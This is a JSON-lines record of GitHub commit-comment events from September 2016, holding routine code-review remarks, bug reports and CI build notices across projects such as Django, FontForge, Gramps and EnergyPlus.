{"id":"4608806174","type":"CommitCommentEvent","actor":{"login":"boynton06"},"repo":{"name":"boynton06/2048-"},"payload":{"comment":{"id":19146836,"position":172,"line":172,"path":"stylesheets/stylesheet.css","commit_id":"1ab4dc851c72b41579e6061af5192f4861672ca4","created_at":"2016-09-23T14:15:40Z","updated_at":"2016-09-23T14:15:40Z","body":"No green\r\n"}},"created_at":"2016-09-23T14:15:40Z"}
{"id":"4608806839","type":"CommitCommentEvent","actor":{"login":"WindarkRey"},"repo":{"name":"Pyorg/P_2016"},"payload":{"comment":{"id":19146843,"position":null,"line":null,"path":null,"commit_id":"640dea84167aac50a3abbdef76d39079828caa83","created_at":"2016-09-23T14:15:47Z","updated_at":"2016-09-23T14:15:47Z","body":"Aca paso unos codigos mas que encontré, de lo que pude leer creo que el primero es mas sencillo, pero me gustaría que sea probado primero...\r\n\r\ndisculpen las molestias.\r\n[mas opc de menu.txt](https://github.com/Pyorg/P_2016/files/489867/mas.opc.de.menu.txt)\r\n"}},"created_at":"2016-09-23T14:15:47Z"}
{"id":"4608807040","type":"CommitCommentEvent","actor":{"login":"bjorn3"},"repo":{"name":"oli-obk/miri"},"payload":{"comment":{"id":19146844,"position":105,"line":653,"path":"src/interpreter/mod.rs","commit_id":"2282289ad5fbfaaaffd6b4fe4ceb6665ab9ab391","created_at":"2016-09-23T14:15:49Z","updated_at":"2016-09-23T14:15:49Z","body":"please combine the pat of VtablePtr and SlicePtr with `|`."}},"created_at":"2016-09-23T14:15:49Z"}
{"id":"4608807779","type":"CommitCommentEvent","actor":{"login":"maki10"},"repo":{"name":"themsaid/framework"},"payload":{"comment":{"id":19146849,"position":null,"line":null,"path":null,"commit_id":"f02bbb83fc729119499bad225572be9b8c6bd050","created_at":"2016-09-23T14:15:56Z","updated_at":"2016-09-23T14:15:56Z","body":"In this case `php artisan make:controller App\\Http\\Controllers\\App\\AppController` while working, \r\nStill not working `php artisan make:controller App\\StoreController`"}},"created_at":"2016-09-23T14:15:56Z"}
{"id":"4608808344","type":"CommitCommentEvent","actor":{"login":"boynton06"},"repo":{"name":"boynton06/2048-"},"payload":{"comment":{"id":19146853,"position":172,"line":172,"path":"stylesheets/stylesheet.css","commit_id":"1ab4dc851c72b41579e6061af5192f4861672ca4","created_at":"2016-09-23T14:16:03Z","updated_at":"2016-09-23T14:16:03Z","body":"What ever how bout green and blue"}},"created_at":"2016-09-23T14:16:03Z"}
{"id":"4608809505","type":"CommitCommentEvent","actor":{"login":"boynton06"},"repo":{"name":"boynton06/2048-"},"payload":{"comment":{"id":19146857,"position":172,"line":172,"path":"stylesheets/stylesheet.css","commit_id":"1ab4dc851c72b41579e6061af5192f4861672ca4","created_at":"2016-09-23T14:16:16Z","updated_at":"2016-09-23T14:16:16Z","body":"Sure"}},"created_at":"2016-09-23T14:16:16Z"}
{"id":"4608813105","type":"CommitCommentEvent","actor":{"login":"themsaid"},"repo":{"name":"themsaid/framework"},"payload":{"comment":{"id":19146865,"position":null,"line":null,"path":null,"commit_id":"f02bbb83fc729119499bad225572be9b8c6bd050","created_at":"2016-09-23T14:16:54Z","updated_at":"2016-09-23T14:16:54Z","body":"What's not working?"}},"created_at":"2016-09-23T14:16:54Z"}
{"id":"4608813845","type":"CommitCommentEvent","actor":{"login":"Gachapen"},"repo":{"name":"overwork/moodlemobile2"},"payload":{"comment":{"id":19146868,"position":21,"line":78,"path":"www/addons/mod/choice/templates/index.html","commit_id":"dcc7f7375727f0a7f4f6c95e97ab44ac999f5d27","created_at":"2016-09-23T14:17:02Z","updated_at":"2016-09-23T14:17:02Z","body":"I think you might have removed a bit too much information by removing this column. If `choice.publish` is true, it will show some user information. I don't know why this is here, and if it should be kept, but you should check it out."}},"created_at":"2016-09-23T14:17:02Z"}
{"id":"4608819517","type":"CommitCommentEvent","actor":{"login":"boynton06"},"repo":{"name":"boynton06/2048-"},"payload":{"comment":{"id":19146883,"position":172,"line":172,"path":"stylesheets/stylesheet.css","commit_id":"1ab4dc851c72b41579e6061af5192f4861672ca4","created_at":"2016-09-23T14:18:05Z","updated_at":"2016-09-23T14:18:05Z","body":"Ok play mine craft with me later"}},"created_at":"2016-09-23T14:18:05Z"}
{"id":"4608820088","type":"CommitCommentEvent","actor":{"login":"TushaarGVS"},"repo":{"name":"TushaarGVS/GitTalk"},"payload":{"comment":{"id":19146885,"position":1,"line":1,"path":"README.md","commit_id":"3ae1eea9f482607e8ce336585ef09f43d1a5a58e","created_at":"2016-09-23T14:18:10Z","updated_at":"2016-09-23T14:18:10Z","body":"This is a Change.\r\n"}},"created_at":"2016-09-23T14:18:10Z"}
{"id":"4608820243","type":"CommitCommentEvent","actor":{"login":"TushaarGVS"},"repo":{"name":"TushaarGVS/GitTalk"},"payload":{"comment":{"id":19146887,"position":1,"line":1,"path":"README.md","commit_id":"3ae1eea9f482607e8ce336585ef09f43d1a5a58e","created_at":"2016-09-23T14:18:12Z","updated_at":"2016-09-23T14:18:12Z","body":"This is a Change.\r\n"}},"created_at":"2016-09-23T14:18:12Z"}
{"id":"4608820411","type":"CommitCommentEvent","actor":{"login":"dzervas"},"repo":{"name":"panagiks/RSPET"},"payload":{"comment":{"id":19146888,"position":13,"line":15,"path":"Client/rspet_client.py","commit_id":"0c6343b016252a4b57a193b6e0fafde2bcfaae95","created_at":"2016-09-23T14:18:14Z","updated_at":"2016-09-23T14:18:14Z","body":"Thanks! :+1: "}},"created_at":"2016-09-23T14:18:14Z"}
{"id":"4608820474","type":"CommitCommentEvent","actor":{"login":"ader1990"},"repo":{"name":"cloudbase/cloudbase-init-ci"},"payload":{"comment":{"id":19146890,"position":null,"line":null,"path":null,"commit_id":"9d8d25aadc091f5e5e098bca06784b35f754c02c","created_at":"2016-09-23T14:18:15Z","updated_at":"2016-09-23T14:18:15Z","body":"doesn't this break the method interface? it will run n-1 times instead of n"}},"created_at":"2016-09-23T14:18:15Z"}
{"id":"4608824091","type":"CommitCommentEvent","actor":{"login":"Gachapen"},"repo":{"name":"overwork/moodlemobile2"},"payload":{"comment":{"id":19146895,"position":5,"line":176,"path":"www/addons/mod/choice/controllers/index.js","commit_id":"dcc7f7375727f0a7f4f6c95e97ab44ac999f5d27","created_at":"2016-09-23T14:18:52Z","updated_at":"2016-09-23T14:18:52Z","body":"Maybe you should rename these to `choiceLabels` and `choiceData` to make it more clear?"}},"created_at":"2016-09-23T14:18:52Z"}
{"id":"4608825128","type":"CommitCommentEvent","actor":{"login":"boynton06"},"repo":{"name":"boynton06/2048-"},"payload":{"comment":{"id":19146900,"position":172,"line":172,"path":"stylesheets/stylesheet.css","commit_id":"1ab4dc851c72b41579e6061af5192f4861672ca4","created_at":"2016-09-23T14:19:03Z","updated_at":"2016-09-23T14:19:03Z","body":"K will you make it or should I make it\r\n"}},"created_at":"2016-09-23T14:19:03Z"}
{"id":"4608830312","type":"CommitCommentEvent","actor":{"login":"maurofmferrao"},"repo":{"name":"maurofmferrao/xibo-cms"},"payload":{"comment":{"id":19146914,"position":null,"line":null,"path":null,"commit_id":"34a20938073d8bfa72ac315e5a1fad51e1c4d7b6","created_at":"2016-09-23T14:19:59Z","updated_at":"2016-09-23T14:19:59Z","body":"- Processed daily data so that we can have an offset ( using [dailyForecast|num_days|start_day] )\r\n\r\n- Merged the forecast unit data (tempUnit and windUnit) mapping functions\r\n\r\n- Replaced bootstrap.css for a minimised version\r\n\r\n- Changed provider message to DarkSky\r\n\r\n- Reorganized css includes\r\n\r\n- Fixed Verify All feature on Modules so that the sub-folder on forecast doesn't break the verification "}},"created_at":"2016-09-23T14:19:59Z"}
{"id":"4608833003","type":"CommitCommentEvent","actor":{"login":"arni2033"},"repo":{"name":"mozilla/mozregression"},"payload":{"comment":{"id":19146920,"position":null,"line":null,"path":null,"commit_id":"ad76910fd0dfefb20697ca1fda18db71615bd8fd","created_at":"2016-09-23T14:20:25Z","updated_at":"2016-09-23T14:20:25Z","body":"Thanks for updating GUI version. It now works with \"autoland\" branch"}},"created_at":"2016-09-23T14:20:25Z"}
{"id":"4608837444","type":"CommitCommentEvent","actor":{"login":"OsipovDenis"},"repo":{"name":"OsipovDenis/frontend-video-angular"},"payload":{"comment":{"id":19146928,"position":37,"line":37,"path":"client/table/dataService.js","commit_id":"73fdb4bf3ce5b5c729467281ec013a878e79300a","created_at":"2016-09-23T14:21:11Z","updated_at":"2016-09-23T14:21:11Z","body":"Я только что заметил, ну в принципе я понял что можно по разному. alert вешать в контроллере, а conole.warn к примеру в service. У меня до этого и была такая мысль, только намешал всё. Сейчас вот разнёс разнёс более менее."}},"created_at":"2016-09-23T14:21:11Z"}
{"id":"4608838592","type":"CommitCommentEvent","actor":{"login":"JoesCat"},"repo":{"name":"fontforge/fontforge"},"payload":{"comment":{"id":19146929,"position":null,"line":null,"path":null,"commit_id":"de21b0224df068dde4ec3c7dc011c74ee69345a3","created_at":"2016-09-23T14:21:23Z","updated_at":"2016-09-23T14:21:23Z","body":"NOTE: replacing finite with isfinite causes a problem with some distros and compilers.\r\nYou are better prepared if you include both of them. Look here for a fix.\r\nhttps://github.com/fontforge/libspiro/commit/158e6675cbebef21dc4fd7fc806ba371c1971a9d\r\nhttps://github.com/fontforge/libspiro/commit/6b68c0d9b462303375402b94ae7459436c495969\r\nLooking at FontForge and libspiro configure.ac files, seems both are under different licenses.\r\nI'll patch this myself since the \"originating\" author has the flexibility to agree to the license of the file, while in your/other author's point of view you can't copy-n-paste it (keeping it legal).\r\n\r\nLikewise, time is also another problem too. You have an example here where FreeBSD had to disconnect the tests: https://www.freshports.org/graphics/libspiro/ but should be okay with HEAD now.\r\nThis can be fixed by putting the code bundle in it's own file (proper GPL header), and then calling it thru an #include <timefile.h>.\r\n\r\nBoth these fixes (above) should help keep FontForge more agree-able (or closer to compatible) for various distro flavors."}},"created_at":"2016-09-23T14:21:23Z"}
{"id":"4608843146","type":"CommitCommentEvent","actor":{"login":"rainy1983"},"repo":{"name":"hklcf/myTV-api"},"payload":{"comment":{"id":19146944,"position":null,"line":null,"path":null,"commit_id":"c687d4c32fb85233f98ef17109d900222ce5696b","created_at":"2016-09-23T14:22:12Z","updated_at":"2016-09-23T14:22:12Z","body":"TVB fix GOTV and MYTVSUPER"}},"created_at":"2016-09-23T14:22:12Z"}
{"id":"4608844734","type":"CommitCommentEvent","actor":{"login":"haromrozsa"},"repo":{"name":"haromrozsa/hello-world"},"payload":{"comment":{"id":19146948,"position":null,"line":null,"path":null,"commit_id":"065b3c814006d9004a3f989c588fbe3506d86167","created_at":"2016-09-23T14:22:27Z","updated_at":"2016-09-23T14:22:27Z","body":"Accepted."}},"created_at":"2016-09-23T14:22:27Z"}
{"id":"4608844831","type":"CommitCommentEvent","actor":{"login":"OsipovDenis"},"repo":{"name":"OsipovDenis/frontend-video-angular"},"payload":{"comment":{"id":19146949,"position":29,"line":28,"path":"client/editItem/views/editItem.tpl.html","commit_id":"73fdb4bf3ce5b5c729467281ec013a878e79300a","created_at":"2016-09-23T14:22:29Z","updated_at":"2016-09-23T14:22:29Z","body":"Понял, принял)"}},"created_at":"2016-09-23T14:22:29Z"}
{"id":"4608845656","type":"CommitCommentEvent","actor":{"login":"haromrozsa"},"repo":{"name":"haromrozsa/hello-world"},"payload":{"comment":{"id":19146950,"position":null,"line":null,"path":null,"commit_id":"065b3c814006d9004a3f989c588fbe3506d86167","created_at":"2016-09-23T14:22:37Z","updated_at":"2016-09-23T14:22:37Z","body":"Accepted."}},"created_at":"2016-09-23T14:22:37Z"}
{"id":"4608849982","type":"CommitCommentEvent","actor":{"login":"dartho94"},"repo":{"name":"dartho94/leap-test"},"payload":{"comment":{"id":19146961,"position":5,"line":7,"path":"app/views/signin.php","commit_id":"b82e4a55101960191f68d8c8c38982898847fbdb","created_at":"2016-09-23T14:23:21Z","updated_at":"2016-09-23T14:23:21Z","body":"Such mistakes much wow -_-"}},"created_at":"2016-09-23T14:23:21Z"}
{"id":"4608850301","type":"CommitCommentEvent","actor":{"login":"gandhis1"},"repo":{"name":"DonJayamanne/pythonVSCode"},"payload":{"comment":{"id":19146963,"position":null,"line":null,"path":null,"commit_id":"8f6c26d8fb392984148756c18e92d3737c5d821b","created_at":"2016-09-23T14:23:24Z","updated_at":"2016-09-23T14:23:24Z","body":"My comments:\r\n\r\n1) Jupyter/ipython shouldn't have to be in the same directory as the interpreter, but it should be somewhere on the PATH\r\n2) I have never heard of anybody debugging their application in IPython...it's an interactive interpreter, errors show up on-the-fly. \r\n3) Are keyboard shortcuts going to be user-dependent? I'm not sure that's the greatest idea, I don't know if the VSCode API allows an extension to set shortcuts but I think it makes a lot of sense to have consistency among users of the extension."}},"created_at":"2016-09-23T14:23:24Z"}
{"id":"4608855095","type":"CommitCommentEvent","actor":{"login":"david-why"},"repo":{"name":"ruf/learn_pi"},"payload":{"comment":{"id":19146971,"position":null,"line":null,"path":null,"commit_id":"0d48c83100a644cb944846c3369d382ddfa54d09","created_at":"2016-09-23T14:24:13Z","updated_at":"2016-09-23T14:24:13Z","body":"第25行误写成了 X = input('O,Where to place?') 了:<"}},"created_at":"2016-09-23T14:24:13Z"}
{"id":"4608855928","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19146975,"position":null,"line":null,"path":null,"commit_id":"7ba17a9d39b7ba9eacd53e12d3ff6b0a3ebce5b0","created_at":"2016-09-23T14:24:22Z","updated_at":"2016-09-23T14:24:22Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1148](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14145&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 245, ignored: 3 Build time: 00:10:30"}},"created_at":"2016-09-23T14:24:22Z"}
{"id":"4608858711","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19146996,"position":null,"line":null,"path":null,"commit_id":"e2d2f83ad2b56e83dbd31f5de50ebf1620c0f6d3","created_at":"2016-09-23T14:24:51Z","updated_at":"2016-09-23T14:24:51Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1149](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14155&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-23T14:24:51Z"}
{"id":"4608859446","type":"CommitCommentEvent","actor":{"login":"WWWangHan"},"repo":{"name":"WWWangHan/LIbrary_System"},"payload":{"comment":{"id":19147000,"position":null,"line":null,"path":null,"commit_id":"645f8bd352dea3268a7d5e3c342b294a03fdd257","created_at":"2016-09-23T14:24:59Z","updated_at":"2016-09-23T14:24:59Z","body":"123"}},"created_at":"2016-09-23T14:24:59Z"}
{"id":"4608861139","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19147003,"position":null,"line":null,"path":null,"commit_id":"ac0d4e7748e0135ff367bc55e1132cbee7f2cc14","created_at":"2016-09-23T14:25:17Z","updated_at":"2016-09-23T14:25:17Z","body":"develop (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1772 of 1772 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ac0d4e7748e0135ff367bc55e1132cbee7f2cc14-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ac0d4e7748e0135ff367bc55e1132cbee7f2cc14-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ac0d4e7748e0135ff367bc55e1132cbee7f2cc14-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.15%25-green.svg)</a>\n"}},"created_at":"2016-09-23T14:25:17Z"}
{"id":"4608865651","type":"CommitCommentEvent","actor":{"login":"bzin"},"repo":{"name":"aminmeyghani/webpack-book"},"payload":{"comment":{"id":19147009,"position":4,"line":4,"path":"chapters/chapter0-preface/0-preface.md","commit_id":"ff1def1414aa2a644e9a418007f2114315ba6422","created_at":"2016-09-23T14:26:04Z","updated_at":"2016-09-23T14:26:04Z","body":"@aminmeyghani you requested to warn you if we find some typo so, `featuers` I would say it should read `features` :)"}},"created_at":"2016-09-23T14:26:04Z"}
{"id":"4608870972","type":"CommitCommentEvent","actor":{"login":"rodica-andronache"},"repo":{"name":"cristian-ungureanu/zerif-lite"},"payload":{"comment":{"id":19147015,"position":5,"line":81,"path":"functions.php","commit_id":"75d700336dece72ac41a284c71f5de8f5858e21d","created_at":"2016-09-23T14:26:58Z","updated_at":"2016-09-23T14:26:58Z","body":"@cristian-ungureanu here I wouldn't use trailingslashit , to keep the code consistend to the other required files. Just add the slash before inc , please"}},"created_at":"2016-09-23T14:26:58Z"}
{"id":"4608872391","type":"CommitCommentEvent","actor":{"login":"prculley"},"repo":{"name":"gramps-project/gramps"},"payload":{"comment":{"id":19147021,"position":null,"line":null,"path":null,"commit_id":"a9f137752938aa067a570f104dbbd8e8a360943b","created_at":"2016-09-23T14:27:12Z","updated_at":"2016-09-23T14:27:12Z","body":"It does have an effect. \r\nIn gramps/gen/utils/file.py\", line 170, in media_path\r\n```\r\n    mpath = db.get_mediapath()\r\n    return expand_media_path(mpath, db)\r\n```\r\nin gramps/gen/db/generic.py 1160\r\n```\r\n    def get_mediapath(self):\r\n        return self.get_metadata(\"media-path\", None)\r\n```\r\nThis used to return a 'None' object before your pylint change; now it returns an empty list.  In expand_media_path, the 'None' object is expected and handled properly.  An empty list is not.\r\n\r\nI think all of this code could use a bit of a review; that this worked before seems amazing.  I found another issue with this code a short time ago that I worked around another way."}},"created_at":"2016-09-23T14:27:12Z"}
{"id":"4608873935","type":"CommitCommentEvent","actor":{"login":"rodica-andronache"},"repo":{"name":"cristian-ungureanu/zerif-lite"},"payload":{"comment":{"id":19147027,"position":104,"line":104,"path":"inc/customize-pro/class-zerif-customize-upsell-pro.php","commit_id":"75d700336dece72ac41a284c71f5de8f5858e21d","created_at":"2016-09-23T14:27:27Z","updated_at":"2016-09-23T14:27:27Z","body":"@cristian-ungureanu what are those tags `<# #>` ?"}},"created_at":"2016-09-23T14:27:27Z"}
{"id":"4608874300","type":"CommitCommentEvent","actor":{"login":"jglick"},"repo":{"name":"docker/jenkins-pipeline-scripts"},"payload":{"comment":{"id":19147032,"position":null,"line":null,"path":null,"commit_id":"98ef065796cdc8ae5b74f1855041fc187c8b1ff8","created_at":"2016-09-23T14:27:31Z","updated_at":"2016-09-23T14:27:31Z","body":"Did you not see #6?"}},"created_at":"2016-09-23T14:27:31Z"}
{"id":"4608874302","type":"CommitCommentEvent","actor":{"login":"jonbuda"},"repo":{"name":"CardsAgainstHumanity/fedex"},"payload":{"comment":{"id":19147033,"position":null,"line":null,"path":null,"commit_id":"db2df1986bf13e0be20fdb825d9ea897a97f6a92","created_at":"2016-09-23T14:27:31Z","updated_at":"2016-09-23T14:27:31Z","body":"@srobbin 👍 thanks for adding this."}},"created_at":"2016-09-23T14:27:31Z"}
{"id":"4608877128","type":"CommitCommentEvent","actor":{"login":"patriotyk"},"repo":{"name":"django/django"},"payload":{"comment":{"id":19147046,"position":16,"line":137,"path":"django/forms/boundfield.py","commit_id":"fab46ce6f5a0a58c4e5e39c9e5e412702beb4a64","created_at":"2016-09-23T14:28:00Z","updated_at":"2016-09-23T14:28:00Z","body":"Guys, there is mistake. Instead of self.initial should be self.field.initial"}},"created_at":"2016-09-23T14:28:00Z"}
{"id":"4608882562","type":"CommitCommentEvent","actor":{"login":"AleksCore"},"repo":{"name":"JarnoVgr/Mr.Green-MTA-Resources"},"payload":{"comment":{"id":19147062,"position":null,"line":null,"path":null,"commit_id":"75ff89b0bdd321440c1c2538976b72bda81c4b97","created_at":"2016-09-23T14:28:54Z","updated_at":"2016-09-23T14:28:54Z","body":"4b891b220e34d572a0952e77594b8e9ed1dfcedd "}},"created_at":"2016-09-23T14:28:54Z"}
{"id":"4608887857","type":"CommitCommentEvent","actor":{"login":"alperyilmaz"},"repo":{"name":"alperyilmaz/BYM4591-book"},"payload":{"comment":{"id":19147074,"position":null,"line":null,"path":null,"commit_id":"3712d714d03567289df72e283726a9dd54ca0cf4","created_at":"2016-09-23T14:29:48Z","updated_at":"2016-09-23T14:29:48Z","body":"I think these changes are meant for your own repo.."}},"created_at":"2016-09-23T14:29:48Z"}
{"id":"4608889790","type":"CommitCommentEvent","actor":{"login":"timgraham"},"repo":{"name":"django/django"},"payload":{"comment":{"id":19147082,"position":16,"line":137,"path":"django/forms/boundfield.py","commit_id":"fab46ce6f5a0a58c4e5e39c9e5e412702beb4a64","created_at":"2016-09-23T14:30:08Z","updated_at":"2016-09-23T14:30:08Z","body":"Please report bugs on Trac, including more of an explanation and steps to reproduce the problem."}},"created_at":"2016-09-23T14:30:08Z"}
{"id":"4608893117","type":"CommitCommentEvent","actor":{"login":"hklcf"},"repo":{"name":"hklcf/myTV-api"},"payload":{"comment":{"id":19147088,"position":null,"line":null,"path":null,"commit_id":"c687d4c32fb85233f98ef17109d900222ce5696b","created_at":"2016-09-23T14:30:41Z","updated_at":"2016-09-23T14:30:41Z","body":"@rainy1983 \r\n\r\n![image](https://cloud.githubusercontent.com/assets/410302/18789375/593ea422-81dd-11e6-9b19-bd9b892f5da1.png)\r\n"}},"created_at":"2016-09-23T14:30:41Z"}
{"id":"4608896472","type":"CommitCommentEvent","actor":{"login":"ryan-buttery"},"repo":{"name":"ryan-buttery/Website"},"payload":{"comment":{"id":19147098,"position":null,"line":null,"path":null,"commit_id":"b880177b0313992921a895d7857cdea9dbf967b1","created_at":"2016-09-23T14:31:18Z","updated_at":"2016-09-23T14:31:18Z","body":"\"Initial commit, readme only\""}},"created_at":"2016-09-23T14:31:18Z"}
{"id":"4608898066","type":"CommitCommentEvent","actor":{"login":"jtanx"},"repo":{"name":"fontforge/fontforge"},"payload":{"comment":{"id":19147101,"position":null,"line":null,"path":null,"commit_id":"de21b0224df068dde4ec3c7dc011c74ee69345a3","created_at":"2016-09-23T14:31:37Z","updated_at":"2016-09-23T14:31:37Z","body":"Well we're already requiring C99 all over the place, so I'm not in favour of adding yet another workaround for what should be required by C99."}},"created_at":"2016-09-23T14:31:37Z"}
{"id":"4608907213","type":"CommitCommentEvent","actor":{"login":"annProg"},"repo":{"name":"annProg/itop-extensions"},"payload":{"comment":{"id":19147130,"position":null,"line":null,"path":null,"commit_id":"0ceaae81345c455fd4f78d224c16c97f22b97ad1","created_at":"2016-09-23T14:33:11Z","updated_at":"2016-09-23T14:33:11Z","body":"fix #32 "}},"created_at":"2016-09-23T14:33:11Z"}
{"id":"4608908335","type":"CommitCommentEvent","actor":{"login":"nicholascloud"},"repo":{"name":"adamlucz90/RecordmateAngular"},"payload":{"comment":{"id":19147135,"position":7,"line":14,"path":"api/controllers/authenticate.js","commit_id":"77f7debfc72434b5c2b652da8e1334a3a022142e","created_at":"2016-09-23T14:33:23Z","updated_at":"2016-09-23T14:33:23Z","body":"Passwords *should* be case sensitive, as it increases complexity."}},"created_at":"2016-09-23T14:33:23Z"}
{"id":"4608911651","type":"CommitCommentEvent","actor":{"login":"fbaumgardt"},"repo":{"name":"fbaumgardt/plokamos"},"payload":{"comment":{"id":19147145,"position":null,"line":null,"path":null,"commit_id":"eddc4467c2e22db3a6f8dfe6df037c0dc443c156","created_at":"2016-09-23T14:33:57Z","updated_at":"2016-09-23T14:33:57Z","body":"Fixes #49"}},"created_at":"2016-09-23T14:33:57Z"}
{"id":"4608914211","type":"CommitCommentEvent","actor":{"login":"dsblank"},"repo":{"name":"gramps-project/gramps"},"payload":{"comment":{"id":19147148,"position":null,"line":null,"path":null,"commit_id":"a9f137752938aa067a570f104dbbd8e8a360943b","created_at":"2016-09-23T14:34:24Z","updated_at":"2016-09-23T14:34:24Z","body":"Ah, I see. Thanks for find that... I need a different default symbol. Will fix."}},"created_at":"2016-09-23T14:34:24Z"}
{"id":"4608914965","type":"CommitCommentEvent","actor":{"login":"dartho94"},"repo":{"name":"dartho94/leap-test"},"payload":{"comment":{"id":19147151,"position":null,"line":null,"path":null,"commit_id":"c8d3f054b2b765227ebd61edf6a3bd6214595d54","created_at":"2016-09-23T14:34:32Z","updated_at":"2016-09-23T14:34:32Z","body":"Silly mistake :("}},"created_at":"2016-09-23T14:34:32Z"}
{"id":"4608915606","type":"CommitCommentEvent","actor":{"login":"rhinton"},"repo":{"name":"nrhint/python-class"},"payload":{"comment":{"id":19147152,"position":null,"line":null,"path":null,"commit_id":"fb0b366e7d8284ce91c84ab0095a6621192cd83b","created_at":"2016-09-23T14:34:39Z","updated_at":"2016-09-23T14:34:39Z","body":"Did you run 'git status' to make sure everything is checked in, and 'git \npush' to make sure your latest changes are on GitHub?\n\nRemind me and we can look at this to figure out what's wrong.\n\n- Ryan\n\n\nOn 9/22/2016 9:48 AM, nrhint wrote:\n>\n> I cant figure out the problem.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub \n> <https://github.com/nrhint/python-class/commit/fb0b366e7d8284ce91c84ab0095a6621192cd83b#commitcomment-19132416>, \n> or mute the thread \n> <https://github.com/notifications/unsubscribe-auth/AAF1WlXrcF7R-MVttDjD1jsbj7LH4qwAks5qsqNBgaJpZM4J_sa1>.\n>\n\n-- \n---\nRyan Hinton\niobass@email.com\n\n"}},"created_at":"2016-09-23T14:34:39Z"}
{"id":"4608917172","type":"CommitCommentEvent","actor":{"login":"kbenne"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19147158,"position":null,"line":null,"path":null,"commit_id":"b210c6dc36d21347152bbe798db8b1170aac3f8b","created_at":"2016-09-23T14:34:55Z","updated_at":"2016-09-23T14:34:55Z","body":"that stinks. There used to be an option to externalize that stuff but i have a memory that they may have taken that out. \r\n\r\nI think not to be confused with external runtime, but the details are fuzzy."}},"created_at":"2016-09-23T14:34:55Z"}
{"id":"4608918486","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19147166,"position":null,"line":null,"path":null,"commit_id":"e2d2f83ad2b56e83dbd31f5de50ebf1620c0f6d3","created_at":"2016-09-23T14:35:09Z","updated_at":"2016-09-23T14:35:09Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1149](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14155&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 260, ignored: 3 Build time: 00:10:18"}},"created_at":"2016-09-23T14:35:09Z"}
{"id":"4608921026","type":"CommitCommentEvent","actor":{"login":"prakashn27"},"repo":{"name":"AlgorithmCrackers/Interview-Questions"},"payload":{"comment":{"id":19147170,"position":3,"line":3,"path":"00_Arrays/ContainsDuplicate/C++/Makefile","commit_id":"7c561b5ffdc64659492ee40d14b707ca0470581e","created_at":"2016-09-23T14:35:36Z","updated_at":"2016-09-23T14:35:36Z","body":"what is the use of this makefile. I am not able to see the code for compiling the code.\r\n"}},"created_at":"2016-09-23T14:35:36Z"}
{"id":"4608923675","type":"CommitCommentEvent","actor":{"login":"VoyagerOne"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":19147177,"position":null,"line":null,"path":null,"commit_id":"a0f4c57da7487b2779f72011c2debbeb657a5082","created_at":"2016-09-23T14:36:03Z","updated_at":"2016-09-23T14:36:03Z","body":"Yeah...it's a massive waste.\r\nThe majority of games play will not be impacted by this specialized patch."}},"created_at":"2016-09-23T14:36:03Z"}
{"id":"4608927001","type":"CommitCommentEvent","actor":{"login":"jkanche"},"repo":{"name":"epiviz/epiviz"},"payload":{"comment":{"id":19147188,"position":null,"line":null,"path":null,"commit_id":"d981aa2eb96be505e1ce2231d970a703d6d7e490","created_at":"2016-09-23T14:36:40Z","updated_at":"2016-09-23T14:36:40Z","body":"hiding text only applies to lower levels of the tree where there are too many nodes to render"}},"created_at":"2016-09-23T14:36:40Z"}
{"id":"4608927288","type":"CommitCommentEvent","actor":{"login":"jtanx"},"repo":{"name":"fontforge/fontforge"},"payload":{"comment":{"id":19147189,"position":null,"line":null,"path":null,"commit_id":"de21b0224df068dde4ec3c7dc011c74ee69345a3","created_at":"2016-09-23T14:36:43Z","updated_at":"2016-09-23T14:36:43Z","body":"I'll just add that FontForge has always [required C99](https://github.com/fontforge/fontforge/blame/b08cd8d7709bb308d3a66796b85b0b80f95eeb2a/configure.ac#L186) for every release after the 2012 release. So I really do not want to add in such workarounds for isfinite."}},"created_at":"2016-09-23T14:36:43Z"}
